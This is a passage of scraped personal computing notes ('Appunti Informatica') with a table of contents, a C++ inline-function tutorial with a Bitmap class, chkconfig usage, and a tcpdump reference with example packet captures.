Top Banner
Inline Functions (C/C++).......................................................................................... 3 LINUX DAEMONS...................................................................................................... 7 tcpdump Command ( Linux )................................................................................... 8 Complete list of byte offsets for filtering with TCPDump ( Linux )...................... 20 Itoa (C/C++)............................................................................................................ 32 TCP/IP Network Configuration Files:.................................................................... 33 Fedora / Red Hat Network GUI Configuration Tools:........................................... 33 Assigning an IP address:....................................................................................... 34 Changing the host name:...................................................................................... 36 Network IP aliasing:.............................................................................................. 36 Activating and De-Activating your NIC:................................................................ 37 Network Classes:................................................................................................... 39 Enable Forwarding:................................................................................................ 40 Adding a network interface card (NIC):................................................................ 40 Configuring your NIC: Speed and Duplex settings: .............................................. 42 Route:..................................................................................................................... 43 VPN, Tunneling:...................................................................................................... 43 Usefull Linux networking commands:................................................................... 44 inetd/xinetd: Network Socket Listener Daemons:............................................... 44 inetd:...................................................................................................................... 45 xinetd: Extended Internet Services Daemon:....................................................... 45 PAM: Network Wrappers:...................................................................................... 48 ICMP:...................................................................................................................... 49 Network Monitoring Tools:.................................................................................... 49 Network Intrusion and Hacker Detection Systems:............................................. 51 ARP: Adress Resolution Protocol........................................................................... 51 Configuring Linux For Network Multicast:........................................................... 51 Living in a MS/Windows World:............................................................................. 52 Network Definitions:............................................................................................. 53 Related Links:......................................................................................................... 54
234

Appunti Informatica

Oct 28, 2015

Download

Documents

Michele Scatena

Appunti che spaziano da Linux System to C++ Software tricks - C++ Code snippets -
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: Appunti Informatica

Inline Functions (C/C++)..........................................................................................................3

LINUX DAEMONS...................................................................................................................7

tcpdump Command ( Linux ).....................................................................................................8

Complete list of byte offsets for filtering with TCPDump ( Linux ).......................................20

Itoa (C/C++).............................................................................................................................32

TCP/IP Network Configuration Files:....................................................................................33

Fedora / Red Hat Network GUI Configuration Tools:..........................................................33

Assigning an IP address:.........................................................................................................34

Changing the host name:.........................................................................................................36

Network IP aliasing:................................................................................................................36

Activating and De-Activating your NIC:................................................................................37

Network Classes:......................................................................................................................39

Enable Forwarding:.................................................................................................................40

Adding a network interface card (NIC):.................................................................................40

Configuring your NIC: Speed and Duplex settings:..............................................................42

Route:.......................................................................................................................................43

VPN, Tunneling:......................................................................................................................43

Usefull Linux networking commands:....................................................................................44

inetd/xinetd: Network Socket Listener Daemons:..................................................................44

inetd:.........................................................................................................................................45

xinetd: Extended Internet Services Daemon:.........................................................................45

PAM: Network Wrappers:.......................................................................................................48

ICMP:.......................................................................................................................................49

Network Monitoring Tools:.....................................................................................................49

Network Intrusion and Hacker Detection Systems:...............................................................51

ARP: Adress Resolution Protocol...........................................................................................51

Configuring Linux For Network Multicast:...........................................................................51

Living in a MS/Windows World:.............................................................................................52

Network Definitions:................................................................................................................53

Related Links:..........................................................................................................................54

Cambiare il nome dell’interfaccia di rete ( Linux )................................................................55

Configuring Static Routes (Linux)..........................................................................................56

Aggiungere Command Prompt al menù contestuale di explorer...........................................58

Rimuovere le Debug information da un binario....................................................................58

Page 2: Appunti Informatica

Timers – microseconds resolution...........................................................................................58

Trasformare una macchina Linux in un Gateway.................................................................60

Adding Users and Restarting Samba ( Linux ).......................................................................64

Manipulating Directories ( C-C++).........................................................................................65

RPM Commands ( Linux )......................................................................................................67

STL Map iterators and deleting ( C++ )..................................................................................68

Managing Linux Modules ( Linux ).......................................................................................70

How to use your Tapedrive ( Linux )......................................................................................71

Conditional Compilation (C++)...............................................................................................78

Using command history in the bash shell ( Linux )...............................................................81

Const Correctness in C++ ( C++ )...........................................................................................88

Some examples of using UNIX find command. (Linux)........................................................99

Timers (C++)..........................................................................................................................101

Output Redirection ( iostream ) (C++)..................................................................................102

Vim..........................................................................................................................................104

Inno Setup (Windows)...........................................................................................................105

Configure NFS (Linux).........................................................................................................106

Appunti Ncurses ( C++ - Linux)............................................................................................112

Network Install HOWTO: Redhat Server Setup ( Linux )...................................................112

ACE Software Development Guidelines ( C++ )...................................................................116

CORBA programming: C++ type mapping for argument passing (C++ /CORBA)............134

Understanding Initialization Lists in C++ (C++).................................................................136

Time Synchronization with NTP (Linux).............................................................................140

RPM package building guide (Linux)...................................................................................148

A brief programming tutorial in C for raw sockets (Linux C++)........................................156

The Linux Socket Filter: Sniffing Bytes over the Network (Linux C++)............................162

Coding for cross platform deployment with gcc/g++: (Linux C++)....................................168

Giving a user access to another user's home directory (Linux)...........................................169

Resizing LVMs (Linux)..........................................................................................................170

Installare CENTOS5 REPO su RED HAT 5........................................................................172

Usare CENTOS repository in RHEL [better] (Linux)..........................................................172

Migrazione CVS2SVN..........................................................................................................174

Page 3: Appunti Informatica

Inline Functions (C/C++)

Suppose that you wish to write a function in C to compute the maximum of two numbers. One way would be to say:

int max(int a, int b) { return (a > b ? a : b); }

But calling a frequently-used function can be a bit slow, and so you instead use a macro:

#define max(a, b) ((a) > (b) ? (a) : (b))

The extra parentheses are required to handle cases like:

max(a = b, c = d)

This approach can work pretty well. But it is error-prone due to the extra parentheses and also because of side effects like:

max(a++, b++)

An alternative in C++ is to use inline functions:

inline int max(int a, int b) { return (a > b ? a : b); }

Such a function is written just like a regular C or C++ function. But it IS a function and not simply a macro; macros don't really obey the rules of C++ and therefore can introduce problems. Note also that one could use C++ templates to write this function, with the argument types generalized to any numerical type.

If an inline function is a member function of a C++ class, there are a couple of ways to write it:

class A { public: void f() { /* stuff */ } // "inline" not needed };

or:

class A { public: inline void f(); };

inline void A::f() { /* stuff */ }

The second style is often a bit clearer.

The "inline" keyword is merely a hint to the compiler or development environment. Not every function can be inlined. Some typical reasons why inlining is sometimes not done include:

Page 4: Appunti Informatica

- the function calls itself, that is, is recursive

- the function contains loops such as for(;;) or while()

- the function size is too large

Most of the advantage of inline functions comes from avoiding the overhead of calling an actual function. Such overhead includes saving registers, setting up stack frames, and so on. But with large functions the overhead becomes less important.

Inline functions present a problem for debuggers and profilers, because the function is expanded at the point of call and loses its identity. A compiler will typically have some option available to disable inlining.

Inlining tends to blow up the size of code, because the function is expanded at each point of call. The one exception to this rule would be a very small inline function, such as one used to access a private data member:

class A { int x; public: int getx() {return x;} };

which is likely to be both faster and smaller than its non-inline counterpart.

A simple rule of thumb when doing development is not to use inline functions initially. After development is mostly complete, you can profile the program to see where the bottlenecks are and then change functions to inlines as appropriate.

Here's a complete program that uses inline functions as part of an implementation of bit maps. Bit maps are useful in storing true/false values efficiently. Note that in a couple of places we could use the new bool fundamental type in place of ints. Also note that this implementation assumes that chars are 8 bits in width; there's no fundamental reason they have to be (in Java(tm) the Unicode character set is used and chars are 16 bits).

This example runs about 50% faster with inlines enabled.

#include <assert.h> #include <stdlib.h> #include <string.h> //#define inline class Bitmap { typedef unsigned long UL; // type of specified bit num UL len; // number of bits unsigned char* p; // pointer to the bits UL size(); // figure out bitmap size public: Bitmap(UL); // constructor ~Bitmap(); // destructor void set(UL); // set a bit void clear(UL); // clear a bit int test(UL); // test a bit void clearall(); // clear all bits }; // figure out bitmap size inline Bitmap::UL Bitmap::size() { return (len - 1) / 8 + 1; }

Page 5: Appunti Informatica

// constructor inline Bitmap::Bitmap(UL n) { assert(n > 0); len = n; p = new unsigned char[size()]; assert(p); clearall(); } // destructor inline Bitmap::~Bitmap() { delete [] p; } // set a bit inline void Bitmap::set(UL bn) { assert(bn < len); p[bn / 8] |= (1 << (bn % 8)); } // clear a bit inline void Bitmap::clear(UL bn) { assert(bn < len); p[bn / 8] &= ~(1 << (bn % 8)); } // test a bit, return non-zero if set inline int Bitmap::test(UL bn) { assert(bn < len); return p[bn / 8] & (1 << (bn % 8)); } // clear all bits inline void Bitmap::clearall() { memset(p, 0, size()); } #ifdef DRIVER main() { const unsigned long N = 123456L; int i; long j; int k; int r; for (i = 1; i <= 10; i++) { Bitmap bm(N); // set all bits then test for (j = 0; j < N; j++) bm.set(j); for (j = 0; j < N; j++) assert(bm.test(j)); // clear all bits then test for (j = 0; j < N; j++) bm.clear(j);

Page 6: Appunti Informatica

for (j = 0; j < N; j++) assert(!bm.test(j)); // run clearall() then test bm.clearall(); for (j = 0; j < N; j++) assert(!bm.test(j)); // set and clear random bits k = 1000; while (k-- > 0) { r = rand() & 0xffff; bm.set(r); assert(bm.test(r)); bm.clear(r); assert(!bm.test(r)); } } return 0; } #endif

Page 7: Appunti Informatica

LINUX DAEMONS

Redhat provides a tool to control daemons on startup: chkconfig

# chkconfigchkconfig version 1.2.24 - Copyright (C) 1997-2000 Red Hat, Inc.Usage: chkconfig --list [Name] chkconfig --add <Name> chkconfig --del <Name> chkconfig [--level <Level>] <Name> <on|off|reset>)

# chkconfig --list sendmailsendmail 0:Aus 1:Aus 2:Ein 3:Ein 4:Ein 5:Ein 6:Aus

 

Page 8: Appunti Informatica

tcpdump Command ( Linux )

Purpose

Prints out packet headers.

Syntax

tcpdump [ -d   ] [  -e   ] [  -f   ] [  -I   ] [  -n   ] [  -N   ] [  -O   ] [  -p   ] [  -q   ] [  -S   ] [  -t   ] [  -v   ] [  -x   ] [  -c   Count ] [  -F   File ] [  -i   Interface ] [  -r   File ] [  -s   Snaplen ] [  -w   File ] [ Expression ]

Description

The tcpdump command prints out the headers of packets captured on a network interface that matches the boolean Expression parameter. If no Expression parameter is given, all packets on the network will be dumped. Otherwise, only packets for which the Expression parameter is True will be dumped. Only Ethernet, Fiber Distributed Data Interface (FDDI), token-ring, and loopback interfaces are supported. Access is controlled by the permissions on /dev/bpfO,1,2, and 3.

The Expression parameter consists of one or more primitives. Primitives usually consist of an id (name or number) preceded by one or more qualifiers. There are three types of qualifier:

typeSpecifies what kind of device the id name or number refers to. Possible types are host, net, and port. Examples are host foo, net 128.3, port 20. If there is no type qualifier, host is assumed.

dirSpecifies a particular transfer direction to or from id. Possible directions are src, dst, src or dst, and src and dst. Some examples with dir qualifiers are: src foo, dst net 128.3, src or dst port ftp-data. If there is no dir qualifier, src or dst is assumed.

proto

Restricts the match to a particular protocol. Possible proto qualifiers are: ether, ip, arp, rarp, tcp, and udp. Examples are: ether src foo, arp net 128.3, tcp port 21. If there is no proto qualifier, all protocols consistent with the type are assumed. For example, src foo means ip or arp, net bar means ip or arp or rarp net bar, and port 53 means tcp or udp port 53.

In addition to the above, there are some special primitive keywords that do not follow the pattern: broadcast, multicast, less, greater, and arithmetic expressions. All of these keywords are described below.

Allowable Primitives

Primitives allowed are the following:

dst host HostTrue if the value of the IP (Internet Protocol) destination field of the packet is the same as the value of the Host variable, which may be either an address or a name.

src host HostTrue if the value of the IP source field of the packet is the same as the value of the Host variable.

host Host True if the value of either the IP source or destination of the packet is the same as the value of the Host variable. Any of the above host expressions can be prepended with the keywords ip, arp, or rarp as in:

ip host Host

If the Host variable is a name with multiple IP addresses, each address will be

Page 9: Appunti Informatica

checked for a match.

dst net NetTrue if the value of the IP destination address of the packet has a network number of Net.

src net NetTrue if the value of the IP source address of the packet has a network number of Net.

net NetTrue if the value of either the IP source or destination address of the packet has a network number of Net.

dst port Port

True if the packet is TCP/IP (Transmission Control Protocol/Internet Protocol) or IP/UDP (Internet Protocol/User Datagram Protocol) and has a destination port value of Port. The port can be a number or a name used in /etc/services. If a name is used, both the port number and protocol are checked. If a number or ambiguous name is used, only the port number is checked (dst port 513 will print both TCP/login traffic and UDP/who traffic, and port domain will print both TCP/domain and UDP/domain traffic).

src port PortTrue if the value of the Port variable is the same as the value of the source port.

port Port

True if the value of either the source or the destination port of the packet is Port. Any of the above port expressions can be prepended with the keywords tcp or udp, as in:

tcp src port port

which matches only TCP packets.

less Length

True if the packet has a length less than or equal to Length. This is equivalent to:

len < = Length.

greater Length

True if the packet has a length greater than or equal to the Length variable. This is equivalent to:

len > = Length

ip proto Protocol

True if the packet is an IP packet of protocol type Protocol. Protocol can be a number or one of the names icmp, udp, or tcp.

Note: The identifiers tcp, udp, and icmp are also keywords and must be escaped via \ (backslash), which is \\ (double backslash) in the korn-shell.

ip broadcastTrue if the packet is an IP broadcast packet. It checks for the all-zeroes and all-ones broadcast conventions, and looks up the local subnet mask.

ip multicast True if the packet is an IP multicast packet.

proto Protocol

True if the packet is of type Protocol. Protocol can be a number or a name like ip, arp, or rarp.

Note: These identifiers are also keywords and must be escaped via \ (backslash).

ip, arp, rarp

Abbreviations for:

proto p

where p is one of the above protocols.tcp, udp, icmp Abbreviations for:

Page 10: Appunti Informatica

ip proto p

where p is one of the above protocols.

Relational Operators of the Expression Parameter

The simple relation:

expr replop expr

Holds true where relop is one of > (greater than), < (less than), >= (greater than or equal to), <= (less than or equal to), = (equal), != (exclamation point and equal sign) and expr is an arithmetic expression composed of integer constants (Expressed in standard C syntax), the normal binary operators + (plus sign), - (minus sign), * (asterisk), / (slash), & (ampersand), | (pipe), a length operator, and special packet data accessors. To access data inside the packet, use the following syntax:

proto [ expr : size ]

Proto is one of the keywords ip, arp, rarp, tcp or icmp, and indicates the protocol layer for the index operation. The byte offset relative to the indicated protocol layer is given by expr. The indicator size is optional and indicates the number of bytes in the field of interest; it can be either one, two, or four, and defaults to one byte. The length operator, indicated by the keyword len, gives the length of the packet.

For example, expression ip[0] & 0xf != 5 catches only unfragmented datagrams and frag 0 of fragmented datagrams. This check is implicitly implied to the tcp and udp index operations. For instance, tcp[0] always means the first byte of the TCP header, and never means the first byte of an intervening fragment.

Combining Primitives

More complex filter expressions are built up by using the words and, or, and not to combine primitives. For example, host foo and not port ftp and not port ftp-data. To save typing, identical qualifier lists can be omitted. For example, tcp dst port ftp or ftp-data or domain is exactly the same as tcp dst port ftp or tcp dst port ftp-data or tcp dst port domain.

Primitives may be combined using a parenthesized group of primitives and operators (parentheses are special to the Shell and must be escaped).

A Negation (`!' or `not'). Concatenation (`and'). Alternation (`or').

Negation has highest precedence. Alternation and concatenation have equal precedence and associate left to right.

If an identifier is given without a keyword, the most recent keyword is assumed. For example,

not host gil and devo

is short for

not host gil and host devo

which should not be confused with

Page 11: Appunti Informatica

not \(host gil or devo\)

Expression arguments can be passed to the tcpdump command as either a single argument or as multiple arguments, whichever is more convenient. Generally, if the expression contains Shell metacharacters, it is easier to pass it as a single, quoted argument. Multiple arguments are concatenated with spaces before being parsed.

Protocol Output Formats

The output of the tcpdump command is protocol-dependent. The following are brief descriptions and examples of most output formats.

TCP Packets

The general format of a TCP protocol line is:

src > dst: flags data-seqno ack win urg options

In the following list of fields, src, dst and flags are always present. The other fields depend on the contents of the packet's TCP protocol header and are output only if appropriate.

src Indicates the source (host) address and port. The src field is always specified.dst Indicates the destination address and port. The dst field is always specified.

flags Specifies some combination of the flags S (SYN), F (FIN), P (PUSH) or R (RST) or a single . (period) to indicate no flags. The flags field is always specified.

data-seqno Describes the portion of sequence space covered by the data in this packet (see example below).

ack Specifies (by acknowledgement) the sequence number of the next data expected from the other direction on this connection.

win Specifies the number of bytes of receive buffer space available from the other direction on this connection.

urg Indicates there is urgent data in the packet.options Specifies TCP options enclosed in angle brackets (for example, <mss 1024>).

Here is the opening portion of the rlogin command from host gil to host devo:

gil.1023 > devo.login:S 768512:768512(0) win 4096 <mss 1024>devo.login > gil.1023:S 947648:947648(0) ack 768513 win 4096 <mss1024>gil.1023 > devo.login: . ack 1 win 4096gil.1023 > devo.login: P 1:2(1) ack 1 win 4096devo.login > gil.1023: ack 2 win 4096gil.1023 > devo.login: P 2:21(19) ack 1 win 4096devo.login > gil.1023: P 1:2(1) ack 21 win 4077devo.login > gil.1023: P 2:3(1) ack 21 win 4077 urg 1devo.login > gil.1023: P 3:4(1) ack 21 win 4077 urg 1

The first line says that TCP port 1023 on host gil sent a packet to the login port on host devo. The S indicates that the SYN flag was set. The packet sequence number was 768512 and it contained no data. (The notion is `first:last(nbytes)' which means `sequence numbers first up to but not including last which is nbytes bytes of user data'.) There was no piggy-backed ack field, the available receive field win was 4096 bytes and there was a max-segment-size(mss) option requesting an mss of 1024 bytes.

Host Devo replies with a similar packet except it includes a piggy-backed ack field for host gil's SYN. Host gil then acknowledges host devo's SYN. The . (period) means no flags were set. The packet contains no data so there is no data sequence number.

Page 12: Appunti Informatica

Note: The ack field sequence number is a small integer (1).

The first time a tcpdump sees a TCP conversation, it prints the sequence number from the packet. On subsequent packets of conversation, the difference between the current packet's sequence number and this initial sequence number is printed. This means that sequence numbers after the first can be interpreted as relative byte positions in the conversation's data stream (with the first data byte each direction being 1). The -S flag overrides this feature, causing the original sequence numbers to be output.

On the sixth line, host gil sends host devo 19 bytes of data (bytes 2 through 20 in the gil-devo side of the conversation). The PUSH flag is set in the packet. On the seventh line, host devo says it received data sent by host gil up to but not including byte 21. Most of this data is apparently sitting in the socket buffer since host devo's receive window has gotten 19 bytes smaller. Host devo also sends one byte of data to host gil in its packet. On the eighth and ninth lines, host devo sends two bytes of urgent PUSH data to host gil.

UDP Packets

UDP format is illustrated by this rwho command packet:

devo.who > bevo.who: udp 84

This command sequence says that port who on host devo sent a udp datagram to port who on host bevo. The packet contained 84 bytes of user data.

Some UDP services are recognized (from the source or destination port number) and the higher level protocol information is printed. In particular, Domain Name service requests (RFC-1034/1035) and Sun RPC calls (RFC-1050) to NFS.

UDP Name Server Requests

Name server requests are formatted as:

src > dst: id op? flags qtype qclass name (len)

In addition to those fields previously explained, UDP name server requests have the following:

id Specifies the identification number of the query.op Specifies the type of operation. The default is the query operation.

qclass

name

(len)

An example of a name server rquest is:

tnegev.1538 > tnubia.domain: 3+ A? austin.ibm.com. (37)

Host tnegev asked the domain server on tnubia for an address record (qtype=A) associated with the name austin.ibm.com. The query id was 3. The + (plus sign) indicates the recursion desired flag was set. The query length was 37 bytes, not including the UDP and IP protocol headers. The query operation was the normal one, Query, so the op field was omitted. If the op had been anything else, it would have been printed between the 3 and the + . Similarly, the qclass was the normal one (C_IN), and it was omitted. Any other qclass would have been printed immediately after the A.

Page 13: Appunti Informatica

A few anomalies are checked and may result in extra fields enclosed in square brackets. If a query contains an answer, name server, or authority section, then ancount, nscount, or arcount are printed as [na], [nn] or [nau] where n is the appropriate count. If any of the response bits are set (AA, RA, or rcode) or any of the `must be zero' bits are set in bytes two and three [b2&3=x] is printed, where x is the hex value of header bytes two and three.

UDP Name Server Responses

Name server responses are formatted as:

src > dst: id op rcode flags a/n/au type class data (len)

In addition to those fields previously explained, UDP name server responses have the following:

rcode

data

An example of a name server response is:

tnubia.domain > tnegev.1538: 3 3/3/7 A 129.100.3tnubia.domain > tnegev.1537: 2 NXDomain* 0/1/0 (97)

In the first example, tnubia responds to query 3 from tnegev with 3 answer records, 3 name server records, and 7 authority records. The first answer record is type A (address) and its data is internet address 129.100.100.3. The total size of the response was 273 bytes, excluding UDP and IP headers. The op (Query) and response code (NoError) were omitted, as was the class (C_IN) of the A record.

In the second example, tnubia responds to query 2 with a response code of non-existent domain (NXDomain) and with 0 answer records, 1 name server record, and 0 authority records. The * (asterisk) indicates that the authoritative answer bit was set. Since there were no answers, no type, class, or data were printed.

Other flag characters that might appear are - (recursion available, RA, not set) and | (truncated message, TC, set).

Note: Name server requests and responses tend to be large and the default snaplen of 80 bytes may not capture enough of the packet to print. Use the -s flag to increase the snaplen if you need to investigate large quantities of name server traffic.

NFS Requests

Sun NFS (Network FIle System) requests and replies are formatted as:

src.xid > dst.nfs: len op argssrc.nfs > dst.xid: reply stat len

In addition to fields previously explained, NFS requests and responses include these fields:

args Specifies the directory file$file handle$.reply stat Indicates the response status of the operation.

An example of an NFS request and response is:

L1.e2766 > L2.nfs: 136 readdir fh 6.5197 8192 bytes @ 0L2.nfs > L1.e2766: reply ok 384L1.e2767 > L2.nfs: 136 lookup fh 6.5197 `RCS'

Page 14: Appunti Informatica

In the first line, host L1 sends a transaction with id e2766 to L2 (note that the number following the src host is a transaction id, not the source port). The request was 136 bytes, excluding the UDP and IP headers. The operation was a readir (read directory) on file handle (fh) 6.5197. Starting at offset 0, 8192 bytes are read. L2 replies ok with 384 bytes of data.

In the third line, L1 asks L2 to lookup the name `RCS' in directory file 6.5197. Note that the data printed depends on the operation type.

Note: NFS requests are very large and the above won't be printed unless snaplen is increased. Use the flag -s 192 to watch NFS traffic.

ARP/RARP Packets

Address Resolution Protocol/Reverse Address Resolution Protocol (ARP/RARP) output shows the type of request and its arguments. The following example shows the start of the rlogin command from host devo to host bevo:

arp who-has bevo tell devoarp reply bevo is-at 1d:2d:3d:4d:5d:6d

The first line says that devo sent an ARP packet asking for the Ethernet address of Internet host bevo. In the second line bevo replies with its Ethernet address.

IP Fragmentation

Fragmented Internet datagrams are printed as:

(frag id:size@offset+)(frag id:size@offset)

The first form indicates that there are more fragments. The second indicates this is the last fragment. IP fragments have the following fields:

id Identifies the fragment.size Specifies the fragment size (in bytes) including the IP header.offset Specifies the fragment's offset (in bytes) in the original datagram.

The fragment information is output for each fragment. The first fragment contains the higher level protocol header and the frag info is printed after the protocol info. Fragments after the first contain no higher level protocol header and the frag info is printed after the source and destination addresses. For example here is a ping echo/reply sequence:

gil > devo: icmp: echo request (frag 34111: 1480@0+)gil > devo: (frag 34111!28@1480)devo > gil: icmp: echo reply (frag 15314:148@0+)

A packet with the IP don't fragment flag is marked with a trailing (DF).

Timestamps

By default, all output lines are preceded by a timestamp. The timestamp is the current clock time in the form

hh:mm:ss.frac

Page 15: Appunti Informatica

and is as accurate as the kernel's clock. The timestamp reflects the time the kernel first saw the packet. No attempt is made to account for the time lag between when the ethernet interface removed the packet from the wire and when the kernel serviced the new packet interrupt.

Flags

-c Exits after receiving Count packets.-d Dumps the compiled packet-matching code to standard output, then stops.

-ePrints the link-level header on each dump line. If the -e flag is specified, the link level header is printed out. On Ethernet and token-ring, the source and destination addresses, protocol, and packet length are printed.

-f Prints foreign internet addresses numerically rather than symbolically.

-FUses File as input for the filter expression. The -F flag ignores any additional expression given on the command line.

-iListens on Interface. If unspecified, the tcpdump command searches the system interface list for the lowest numbered and configured interface that is up. This search excludes loopback interfaces.

-I (Capital i) Specifies immediate packet capture mode. The -l flag does not wait for the buffer to fill up.

-l

(Lowercase L) Buffers the standard out (stdout) line. This flag is useful if you want to see the data while capturing it. For example: tcpdump -l : tee dat

or

tcpdump -l > dat & tail -f dat

-n Omits conversion of addresses to names.

-NOmits printing domain name qualification of host names. For example, the -N flag prints gil instead of gil.austin.ibm.com.

-OOmits running the packet-matching code optimizer. This is useful only if you suspect a bug in the optimizer.

-pSpecifies that the interface not run in promiscuous mode.

Note: The interface might be in promiscuous for some other reason; hence, -p cannot be used as an abbreviation for `ether host {localhost}' or `broadcast'.

-q Quiets output. The -q flag prints less protocol information so output lines are shorter.-r Reads packets from File (which was created with the -w option). Standard input is used if File is "-".

-s

Captures Snaplen bytes of data from each packet rather than the default of 80. Eighty bytes is adequate for IP, ICMP, TCP, and UDP but may truncate protocol information from name server and NFS packets (see below). Packets truncated because of a limited snapshot are indicated in the output with "[|proto]", where proto is the name of the protocol level at which the truncation has occurred.

Note: Taking larger snapshots increases the amount of time it takes to process packets thereby decreasing the amount of packet buffering. This may cause packets to be lost. You should limit Snaplen to the smallest number of bytes that capture the protocol information you are interested in.

-S Prints absolute rather than relative TCP sequence numbers.-t Omits the printing of a timestamp on each dump line.-tt Prints an unformatted timestamp on each dump line.

-vSpecifies slightly more verbose output. For example, the time to live and the type of service information in an IP packet is printed.

-wWrites the raw packets to File rather than parsing and printing them out. They can later be printed with the -r flag. Standard output is used if  File is "-".

-xPrints each packet (minus its link level header) in hex. The smaller of the entire packet or Snaplen bytes will be printed.

Examples

Page 16: Appunti Informatica

1. To print all packets arriving at or departing from devo:

tcpdump host devo

2. To print traffic between gil and either devo or bevo:

tcpdump ip host gil and \(devo bevo\)

3. To print all IP packets between bevo and any host except gil:

tcpdump ip host bevo and bevo gil

4. To print all traffic between local hosts and hosts on network 192.100.192:

tcpdump net 192.100.192

5. To print traffic neither sourced from nor destined for local hosts:

tcpdump ip and not net localnet

6. To print the start and end packets (the SYN and FIN packets) of each TCP conversation that involves a non-local host:

tcpdump \(tcp[13] \& 3 !=0 and not src and dst net localnet\)

7. To print all ICMP packets that are not echo requests or replies (not ping packets):

tcpdump \(icmp[0] !=8 and icmp[0] !=0\)

8. To immediately print packet information, enter

tcpdump -I

9. To specify the token-ring interface to listen on, enter:

tcpdump -i tr0

10. To print packet information to the file TraceInfo, enter:

tcpdump -wTraceInfo

Miche : Stampa i pacchetti udp sulla interfaccia di loopbacktcpdump –i lo udp

Page 17: Appunti Informatica

From: http://openmaniak.com/tcpdump.php

2. TCPDUMP USE

To display the Standard TCPdump output:

#tcpdump tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

21:57:29.004426 IP 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53 21:57:31.228013 arp who-has 192.168.1.2 tell 192.168.1.1 21:57:31.228020 arp reply 192.168.1.2 is-at 00:04:75:22:22:22 (oui Unknown) 21:57:38.035382 IP 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53 21:57:38.613206 IP valve-68-142-64-164.phx3.llnw.net.27014 > 192.168.1.2.1034: UDP, length 36

To display the verbose output:

#tcpdump -v tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

22:00:11.625995 IP (tos 0x0, ttl 128, id 30917, offset 0, flags [none], proto: UDP (17), length: 81) 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53 22:00:20.691903 IP (tos 0x0, ttl 128, id 31026, offset 0, flags [none], proto: UDP (17), length: 81) 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53 22:00:21.230970 IP (tos 0x0, ttl 114, id 4373, offset 0, flags [none], proto: UDP (17), length: 64) valve-68-142-64-164.phx3.llnw.net.27014 > 192.168.1.2.1034: UDP, length 36 22:00:26.201715 arp who-has 192.168.1.2 tell 192.168.1.1 22:00:26.201726 arp reply 192.168.1.2 is-at 00:04:11:11:11:11 (oui Unknown) 22:00:29.706020 IP (tos 0x0, ttl 128, id 31133, offset 0, flags [none], proto: UDP (17), length: 81) 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53 22:00:38.751355 IP (tos 0x0, ttl 128, id 31256, offset 0, flags [none], proto: UDP (17), length: 81) 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53

Network interfaces available for the capture:

#tcpdump -D 1.eth0 2.any (Pseudo-device that captures on all interfaces) 3.lo

To display numerical addresses rather than symbolic (DNS) addresses:

#tcpdump -n tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

22:02:36.111595 IP 192.168.1.2.1034 > 68.142.64.164.27014: UDP, length 53 22:02:36.669853 IP 68.142.64.164.27014 > 192.168.1.2.1034: UDP, length 36 22:02:41.702977 arp who-has 192.168.1.2 tell 192.168.1.1 22:02:41.702984 arp reply 192.168.1.2 is-at 00:04:11:11:11:11 22:02:45.106515 IP 192.168.1.2.1034 > 68.142.64.164.27014: UDP, length 53 22:02:50.392139 IP 192.168.1.2.138 > 192.168.1.255.138: NBT UDP PACKET(138) 22:02:54.139658 IP 192.168.1.2.1034 > 68.142.64.164.27014: UDP, length 53 22:02:57.866958 IP 125.175.131.58.3608 > 192.168.1.2.9501: S 3275472679:3275472679(0) win 65535

To display the quick output:

#tcpdump -q tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

22:03:55.594839 IP a213-22-130-46.cpe.netcabo.pt.3546 > 192.168.1.2.9501: tcp 0 22:03:55.698827 IP 192.168.1.2.9501 > a213-22-130-46.cpe.netcabo.pt.3546: tcp 0 22:03:56.068088 IP a213-22-130-46.cpe.netcabo.pt.3546 > 192.168.1.2.9501: tcp 0 22:03:56.068096 IP 192.168.1.2.9501 > a213-22-130-46.cpe.netcabo.pt.3546: tcp 0

Page 18: Appunti Informatica

22:03:57.362863 IP 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53 22:03:57.964397 IP valve-68-142-64-164.phx3.llnw.net.27014 > 192.168.1.2.1034: UDP, length 36 22:04:06.406521 IP 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53 22:04:15.393757 IP 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53

Capture the traffic of a particular interface:

tcpdump -i eth0 To capture the UDP traffic:

#tcpdump udp To capture the TCP port 80 traffic:

#tcpdump port http To capture the traffic from a filter stored in a file:

#tcpdump -F file_name To create a file where the filter is configured (here the TCP 80 port)

#vim file_name port 80 To stop the capture after 20 packets:

#tcpdump -c 20 To send the capture output in a file instead of directly on the screen:

#tcpdump -w capture.log To read a capture file:

#tcpdump -r capture.log reading from file capture.log, link-type EN10MB (Ethernet)

09:33:51.977522 IP 192.168.1.36.40332 > rr.knams.wikimedia.org.www: P 1548302662:1548303275(613) ack 148796145 win 16527 09:33:52.031729 IP rr.knams.wikimedia.org.www > 192.168.1.36.40332: . ack 613 win 86 09:33:52.034414 IP rr.knams.wikimedia.org.www > 192.168.1.36.40332: P 1:511(510) ack 613 win86

09:33:52.034786 IP 192.168.1.36.40332 > rr.knams.wikimedia.org.www: . ack 511 win 16527

The captured data isn't stored in plain text so you cannot read it with a text editor, you have to use a special tool like TCPdump (see above) or Wireshark (Formerly Ethereal) which provides a graphical interface.

The capture.log file is opened with Wireshark.

To display the packets having "www.openmaniak.com" as their source or destination address:

#tcpdump host www.openmaniak.com To display the FTP packets coming from 192.168.1.100 to 192.168.1.2:

#tcpdump src 192.168.1.100 and dst 192.168.1.2 and port ftp To display the packets content:

Page 19: Appunti Informatica

